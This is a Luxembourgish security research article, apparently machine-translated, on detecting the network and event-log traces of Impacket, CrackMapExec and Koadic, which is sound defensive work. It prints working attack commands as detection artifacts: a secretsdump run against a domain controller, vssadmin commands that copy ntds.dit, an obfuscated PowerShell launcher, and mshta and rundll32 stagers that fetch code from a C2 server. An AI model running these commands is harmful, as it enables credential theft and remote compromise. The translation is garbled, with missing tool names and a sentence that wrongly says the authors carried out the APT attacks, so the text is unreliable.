D'Zuel vun den Attentater am Firmeberäich wiisst all Joer: zum Beispill wéi am Joer 2016, an Enn 2018 - wéi an der viregter Period. Inklusiv déi wou den Haaptaarbechtsinstrument de Windows Betriebssystem ass. Am 2017-2018 huet den APT Dragonfly, APT28, Attacken op Regierung a Militärorganisatiounen an Europa, Nordamerika a Saudi Arabien duerchgefouert. A mir hunn dräi Tools fir dëst benotzt - , и . Hir Quellcode ass op a verfügbar op GitHub.
Et ass derwäert ze bemierken datt dës Tools net fir initial Pénétratioun benotzt ginn, awer fir en Attack an der Infrastruktur z'entwéckelen. Ugräifer benotzen se a verschiddene Stadien vun der Attack no der Pénétratioun vum Perimeter. Dëst, iwwregens, ass schwéier z'entdecken an dacks nëmme mat der Hëllef vun der Technologie oder Tools déi erlaben . D'Tools bidden eng Vielfalt vu Funktiounen, vu Dateien iwwerdroen fir mat der Registry ze interagéieren an Kommandoen op enger Fernmaschinn auszeféieren. Mir hunn eng Studie vun dësen Tools gemaach fir hir Netzwierkaktivitéit ze bestëmmen.
Wat mir misse maachen:
- Verstinn wéi Hacking Tools funktionnéieren. Fannt eraus wat Ugräifer mussen ausnotzen a wéi eng Technologien se benotze kënnen.
- Fannt wat net vun Informatiounssécherheetsinstrumenter an den éischte Stadien vun engem Attack festgestallt gëtt. D'Opklärungsphase kann iwwersprangen ginn, entweder well den Ugräifer en internen Ugräifer ass, oder well den Ugräifer e Lach an der Infrastruktur ausnotzt dat net virdru bekannt war. Et gëtt méiglech déi ganz Kette vu sengen Handlungen ze restauréieren, dofir de Wonsch weider Bewegung z'entdecken.
- Eliminéiert falsch Positiver vun Intrusiounserkennungsinstrumenter. Mir däerfen net vergiessen datt wann verschidden Aktiounen eleng op Basis vun der Opklärung festgestallt ginn, dacks Feeler méiglech sinn. Normalerweis gëtt et an der Infrastruktur eng genuch Zuel vu Weeër, déi op den éischte Bléck net vu legitimen z'ënnerscheeden, fir all Informatioun ze kréien.
Wat ginn dës Tools fir Ugräifer? Wann dëst Impacket ass, kréien Ugräifer eng grouss Bibliothéik vu Moduler, déi a verschiddene Stadien vun der Attack benotzt kënne ginn, déi no der Paus vum Perimeter verfollegen. Vill Tools benotzen Impacket Moduler intern - zum Beispill Metasploit. Et huet dcomexec a wmiexec fir Remote Kommando Ausféierung, Secretsdump fir Konten aus der Erënnerung ze kréien déi aus Impacket bäigefüügt ginn. Als Resultat wäert d'korrekt Detektioun vun der Aktivitéit vun esou enger Bibliothéik d'Detektioun vun Derivate garantéieren.
Et ass keen Zoufall datt d'Creatoren "Powered by Impacket" iwwer CrackMapExec (oder einfach CME) geschriwwen hunn. Zousätzlech huet CME fäerdege Funktionalitéit fir populär Szenarien: Mimikatz fir Passwierder oder hir Hashes ze kréien, Implementatioun vu Meterpreter oder Empire Agent fir Remote Ausféierung, a Bloodhound u Bord.
Dat drëtt Tool dat mir gewielt hunn war Koadic. Et ass zimlech rezent, et gouf op der internationaler Hackerkonferenz DEFCON 25 am 2017 presentéiert an ënnerscheet sech vun enger net-Standard Approche: et funktionnéiert iwwer HTTP, Java Script a Microsoft Visual Basic Script (VBS). Dës Approche gëtt vum Land wunnen genannt: d'Tool benotzt eng Rei Ofhängegkeeten a Bibliothéiken a Windows agebaut. D'Creatoren nennen et COM Command & Control, oder C3.
IMPACKET
D'Funktionalitéit vum Impacket ass ganz breet, rangéiert vun Opklärung bannent AD a Sammelen vun Daten vun internen MS SQL Server, bis Techniken fir Umeldungsinformatiounen ze kréien: dëst ass en SMB Relais Attack, an d'Erhaalung vun der ntds.dit Datei mat Hashes vu Benotzerpasswierder vun engem Domain Controller. Impacket féiert och Kommandoen op afstand mat véier verschidde Methoden: WMI, Windows Scheduler Management Service, DCOM, a SMB, a erfuerdert Umeldungsinformatiounen fir dat ze maachen.
Geheimnis
Loosst eis Secretsdump kucken. Dëst ass e Modul dee souwuel Benotzermaschinnen an Domain Controller ziele kann. Et kann benotzt ginn Kopie vun Erënnerung Beräicher LSA ze kréien, SAM, SECURITY, NTDS.dit, sou kann et op verschidden Etappe vun der Attack gesi ginn. Den éischte Schrëtt an der Operatioun vum Modul ass d'Authentifikatioun iwwer SMB, déi entweder de Benotzerpasswuert oder säin Hash erfuerdert fir automatesch de Pass the Hash Attack auszeféieren. Als nächst kënnt eng Ufro fir Zougang zum Service Control Manager (SCM) opzemaachen an Zougang zum Registry iwwer de Winreg Protokoll ze kréien, mat deem en Ugräifer d'Donnéeën vun Interessenten erausfannen an Resultater iwwer SMB kréien.
An Fig. 1 gesi mir wéi genau wann Dir de Winreg Protokoll benotzt, Zougang gëtt mat engem Registry Key mat enger LSA kritt. Fir dëst ze maachen, benotzt den DCERPC Kommando mat opcode 15 - OpenKey.
Reis. 1. Ouverture engem Enregistrement Schlëssel mat der Winreg Protokoll
Als nächst, wann den Zougang zum Schlëssel kritt gëtt, ginn d'Wäerter mat dem SaveKey Kommando mat opcode 20 gespäichert. Impacket mécht dat op eng ganz spezifesch Manéier. Et späichert d'Wäerter op eng Datei, deem säin Numm eng String vun 8 zoufälleg Zeechen ass, déi mat .tmp ugeschloss ass. Zousätzlech geschitt weider Eroplueden vun dëser Datei iwwer SMB aus dem System32 Verzeichnis (Fig. 2).
Reis. 2. Schema fir e Registry Key vun enger Remote Maschinn ze kréien
Et stellt sech eraus datt esou Aktivitéiten am Netz duerch Ufroen op bestëmmte Registry Branchen erkannt kënne ginn mat dem Winreg Protokoll, spezifesch Nimm, Kommandoen an hir Uerdnung.
Dëse Modul léisst och Spueren am Windows Event Log, sou datt et einfach z'entdecken ass. Zum Beispill, als Resultat vun der Ausféierung vum Kommando
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCAm Windows Server 2016 Log wäerte mir déi folgend Schlësselsequenz vun Eventer gesinn:
1. 4624 - Remote Logon.
2. 5145 - iwwerpréift Zougangsrechter op de Winreg Remote Service.
3. 5145 - kontrolléiert d'Datei Zougangsrechter am System32 Verzeichnis. De Fichier huet den zoufälleg Numm uewen ernimmt.
4. 4688 - e cmd.exe Prozess erstellen deen vssadmin lancéiert:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - e Prozess erstellen mam Kommando:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - e Prozess erstellen mam Kommando:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - e Prozess erstellen mam Kommando:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Wéi vill Post-Exploitatiounsinstrumenter huet Impacket Moduler fir Kommandoen op afstand auszeféieren. Mir konzentréieren eis op smbexec, déi eng interaktiv Kommandoshell op enger Fernmaschinn ubitt. Dëse Modul erfuerdert och Authentifikatioun iwwer SMB, entweder mat engem Passwuert oder engem Passwuert Hash. An Fig. An der Figur 3 gesi mir e Beispill wéi esou en Tool funktionnéiert, an dësem Fall ass et déi lokal Administratorkonsole.
Reis. 3. Interaktiven smbexec Konsol
Den éischte Schrëtt vun smbexec no der Authentifikatioun ass den SCM mam OpenSCManagerW Kommando opzemaachen (15). D'Ufro ass bemierkenswäert: de Feld MachineName ass DUMMY.
Reis. 4. Ufro Service Kontroll Manager opzemaachen
Als nächst gëtt de Service erstallt mat dem CreateServiceW Kommando (12). Am Fall vun smbexec kënne mir all Kéier déiselwecht Kommandokonstruktiounslogik gesinn. An Fig. 5 gréng bedeit onverännerbar Kommandoparameter, Giel weist wat en Ugräifer änneren kann. Et ass einfach ze gesinn datt den Numm vun der ausführbarer Datei, säin Verzeechnes an d'Ausgabdatei ka geännert ginn, awer de Rescht ass vill méi schwéier ze änneren ouni d'Logik vum Impacket Modul ze stéieren.
Reis. 5. Ufro fir e Service ze schafen mat Service Kontroll Manager
Smbexec léisst och offensichtlech Spuren am Windows Event Log. Am Windows Server 2016 Logbuch fir d'interaktive Kommandoshell mam Kommando ipconfig, gesi mir déi folgend Schlësselsequenz vun Eventer:
1. 4697 - Installatioun vum Service op der Maschinn vum Affer:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - Kreatioun vum cmd.exe Prozess mat den Argumenter vum Punkt 1.
3. 5145 - Iwwerpréift Zougangsrechter op d'__output Datei am C $ Verzeechnes.
4. 4697 - Installatioun vum Service op der Maschinn vum Affer.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - Kreatioun vum cmd.exe Prozess mat den Argumenter vum Punkt 4.
6. 5145 - Iwwerpréift Zougangsrechter op d'__output Datei am C $ Verzeechnes.
Impacket ass d'Basis fir d'Entwécklung vun Attack Tools. Et ënnerstëtzt bal all Protokoller an der Windows Infrastruktur a gläichzäiteg huet seng eege charakteristesch Features. Hei sinn spezifesch Winreg Ufroen, an d'Benotzung vun der SCM API mat charakteristesche Kommando Formatioun, an de Fichier Numm Format, an SMB deelen SYSTEM32.
CRACKMAPEXEC
D'CME-Tool ass haaptsächlech entwéckelt fir dës Routineaktiounen ze automatiséieren déi en Ugräifer muss ausféieren fir am Netz virzegoen. Et erlaabt Iech a Verbindung mam bekannte Empire Agent a Meterpreter ze schaffen. Fir Kommandoen geheim auszeféieren, kann CME se verschmëlzen. Mat Hëllef vu Bloodhound (e separaten Opklärungsinstrument) kann en Ugräifer d'Sich no enger aktiver Domain Administrator Sessioun automatiséieren.
Bloodhound
Bloodhound, als Standalone Tool, erlaabt fortgeschratt Opklärung am Netz. Et sammelt Daten iwwer Benotzer, Maschinnen, Gruppen, Sessiounen a gëtt als PowerShell Skript oder binär Datei geliwwert. LDAP oder SMB-baséiert Protokoller gi benotzt fir Informatioun ze sammelen. D'CME Integratioun Modul erlaabt Bloodhound op d'Maschinn vum Affer erofzelueden, lafen a kréien déi gesammelten Donnéeën no der Ausféierung, doduerch automatiséiert Aktiounen am System a mécht se manner bemierkbar. D'Bloodhound grafesch Shell stellt déi gesammelten Donnéeën a Form vu Grafike vir, wat Iech erlaabt de kuerste Wee vun der Maschinn vum Ugräifer an den Domain Administrator ze fannen.
Reis. 6. Bloodhound Interface
Fir op der Maschinn vum Affer ze lafen, erstellt de Modul eng Aufgab mat ATSVC a SMB. ATSVC ass en Interface fir mam Windows Task Scheduler ze schaffen. CME benotzt seng NetrJobAdd (1) Funktioun fir Aufgaben iwwer dem Netz ze kreéieren. E Beispill vu wat de CME Modul schéckt gëtt an der Fig. 7: Dëst ass e cmd.exe Kommandoruff a verstoppte Code a Form vun Argumenter am XML-Format.
Fig.7. Schafen eng Aufgab via CME
Nodeems d'Aufgab fir Ausféierung presentéiert gouf, fänkt d'Affer Maschinn Bloodhound selwer un, an dëst kann am Verkéier gesi ginn. De Modul ass charakteriséiert duerch LDAP Ufroen fir Standardgruppen ze kréien, eng Lëscht vun alle Maschinnen a Benotzer am Domain, an Informatioun iwwer aktive Benotzersessiounen duerch d'SRVSVC NetSessEnum Ufro ze kréien.
Reis. 8. Eng Lëscht vun aktive Sessiounen iwwer SMB kréien
Zousätzlech ass de Start vun Bloodhound op enger Maschinn vun engem Affer mat Audit aktivéiert begleet vun engem Event mat ID 4688 (Prozesskreatioun) an dem Prozessnumm «C:WindowsSystem32cmd.exe». Wat bemierkenswäert ass, sinn d'Command Line Argumenter:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Den enum_avproducts Modul ass ganz interessant aus der Siicht vu Funktionalitéit an Ëmsetzung. WMI erlaabt Iech d'WQL Query Sprooch ze benotzen fir Daten aus verschiddene Windows Objekter ze recuperéieren, wat am Wesentlechen ass wat dësen CME Modul benotzt. Et generéiert Ufroen un d'AntiSpywareProduct an AntiМirusProduct Klassen iwwer d'Schutzinstrumenter déi op der Maschinn vum Affer installéiert sinn. Fir déi néideg Donnéeën ze kréien, verbënnt de Modul mam rootSecurityCenter2 Nummraum, generéiert dann eng WQL Ufro a kritt eng Äntwert. An Fig. Figur 9 weist den Inhalt vun esou Ufroen an Äntwerten. An eisem Beispill gouf Windows Defender fonnt.
Reis. 9. Reseau Aktivitéit vun der enum_avproducts Modul
Dacks kann WMI Audit (Trace WMI-Aktivitéit), an deenen hir Eventer Dir nëtzlech Informatiounen iwwer WQL Ufroen fannen, behënnert ginn. Awer wann et aktivéiert ass, dann wann de enum_avproducts Skript leeft, gëtt en Event gespäichert mat ID 11. Et enthält den Numm vum Benotzer deen d'Ufro geschéckt huet an den Numm am rootSecurityCenter2 Nummraum.
Jiddereng vun den CME Moduler hat seng eege Artefakte, sief et spezifesch WQL Ufroen oder d'Schafung vun enger bestëmmter Zort Aufgab an engem Task Scheduler mat Verdueblung a Bloodhound-spezifesch Aktivitéit an LDAP a SMB.
KOADIC
Eng ënnerschiddlech Feature vu Koadic ass d'Benotzung vu JavaScript a VBScript Dolmetscher a Windows agebaut. An dësem Sënn follegt et dem Liewen vum Land Trend - dat ass, et huet keng extern Ofhängegkeeten a benotzt Standard Windows Tools. Dëst ass e Tool fir voll Command & Control (CnC), well no der Infektioun gëtt en "Implantat" op der Maschinn installéiert, wat et erlaabt ze kontrolléieren. Esou eng Maschinn, an der Koadescher Terminologie, gëtt eng "Zombie" genannt. Wann et net genuch Privilegien fir voll Operatioun op der Säit vum Affer sinn, huet Koadic d'Fäegkeet fir se z'erhéijen mat User Account Control Bypass (UAC Bypass) Techniken.
Reis. 10. Koadic Shell
D'Affer muss Kommunikatioun mam Command & Control Server initiéieren. Fir dëst ze maachen, muss se e virdru preparéierten URI kontaktéieren an den Haapt Koadic Kierper mat engem vun de Stagers kréien. An Fig. Figur 11 weist e Beispill fir de mshta stager.
Reis. 11. Initialiséiere vun enger Sessioun mam CnC Server
Baséierend op der Äntwert Variabel WS, gëtt et kloer datt d'Ausféierung duerch WScript.Shell geschitt, an d'Variabelen STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE enthalen Schlësselinformatioun iwwer d'Parameter vun der aktueller Sessioun. Dëst ass dat éischt Ufro-Äntwert Pair an enger HTTP Verbindung mat engem CnC Server. Déi spéider Ufroe sinn direkt mat der Funktionalitéit vun de genannte Moduler (Implantate) verbonnen. All Koadic Moduler funktionnéieren nëmme mat enger aktiver Sessioun mat CnC.
Mimikatz
Just wéi CME schafft mat Bloodhound, schafft Koadic mat Mimikatz als separat Programm an huet verschidde Weeër fir et ze starten. Drënner ass en Ufro-Äntwert Pair fir de Mimikatz Implantat erofzelueden.
Reis. 12. Transfert Mimikatz zu Koadic
Dir kënnt gesinn wéi den URI Format an der Ufro geännert huet. Et enthält elo e Wäert fir d'csrf Variabel, déi verantwortlech ass fir de gewielte Modul. Opgepasst net op hirem Numm; Mir all wëssen datt CSRF normalerweis anescht verstane gëtt. D'Äntwert war deeselwechten Haaptkierper vum Koadic, zu deem Code am Zesummenhang mam Mimikatz bäigefüügt gouf. Et ass zimlech grouss, also loosst eis d'Schlësselpunkte kucken. Hei hu mir d'Mimikatz-Bibliothéik, déi am base64 kodéiert ass, eng serialiséierter .NET-Klass déi se sprëtzen, an Argumenter fir Mimikatz ze starten. D'Ausféierungsresultat gëtt iwwer d'Netz a Kloertext iwwerdroen.
Reis. 13. Resultat vun engem Lafen Mimikatz op enger Remote Maschinn
Exec_cmd
Koadic huet och Moduler déi Kommandoen op afstand ausféiere kënnen. Hei wäerte mir déiselwecht URI Generatiounsmethod an déi vertraute Sid- a csrf Variablen gesinn. Am Fall vum exec_cmd Modul gëtt de Code an de Kierper bäigefüügt, dee fäeg ass Shellbefehle auszeféieren. Drënner gëtt esou Code gewisen an der HTTP Äntwert vum CnC Server.
Reis. 14. Implantat Code exec_cmd
D'GAWTUUGCFI Variabel mat dem vertraute WS Attribut ass erfuerderlech fir Code Ausféierung. Mat senger Hëllef nennt de Implantat d'Schuel, veraarbecht zwou Branchen vum Code - shell.exec mam Retour vum Ausgabdatenstroum a shell.run ouni zréckzekommen.
Koadic ass keen typescht Tool, awer et huet seng eege Artefakte, duerch déi et am legitimen Traffic ka fonnt ginn:
- speziell Formatioun vun HTTP-Ufroen,
- benotzt winHttpRequests API,
- e WScript.Shell Objet iwwer ActiveXObject erstellen,
- grouss ausféierbar Kierper.
Déi initial Verbindung gëtt vum Stageer initiéiert, sou datt et méiglech ass seng Aktivitéit duerch Windows Eventer z'entdecken. Fir mshta ass dëst Event 4688, wat d'Schafung vun engem Prozess mat dem Startattribut bezeechent:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Wärend Koadic leeft, kënnt Dir aner 4688 Eventer gesinn mat Attributer déi et perfekt charakteriséieren:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Conclusiounen
D'Liewen vum Land Trend gewënnt Popularitéit ënner Krimineller. Si benotzen d'Tools a Mechanismen agebaut a Windows fir hir Bedierfnesser. Mir gesinn populär Tools Koadic, CrackMapExec an Impacket no dësem Prinzip ëmmer méi an APT Berichter erschéngen. D'Zuel vun de Gabel op GitHub fir dës Tools wiisst och, an nei erschéngen (et gi scho ronn dausend vun hinnen elo). Den Trend gewënnt Popularitéit wéinst senger Einfachheet: Ugräifer brauche keng Drëtt-Partei-Tools; si sinn schonn op Maschinnen vun den Affer an hëllefen hinnen d'Sécherheetsmoossnamen ze vermeiden. Mir konzentréieren eis op d'Netzkommunikatioun ze studéieren: all Tool uewen beschriwwen léisst seng eege Spuren am Netzverkéier; detailléiert Etude vun hinnen erlaabt eis eise Produit ze léieren se z'entdecken, wat schlussendlech hëlleft fir d'ganz Kette vu Cyber-Tëschefäll mat hinnen z'ënnersichen.
Auteuren:
- Anton Tyurin, Chef vum Expert Services Department, PT Expert Security Center, Positive Technologies
- Egor Podmokov, Expert, PT Expert Security Center, Positive Technologies
Source: will.com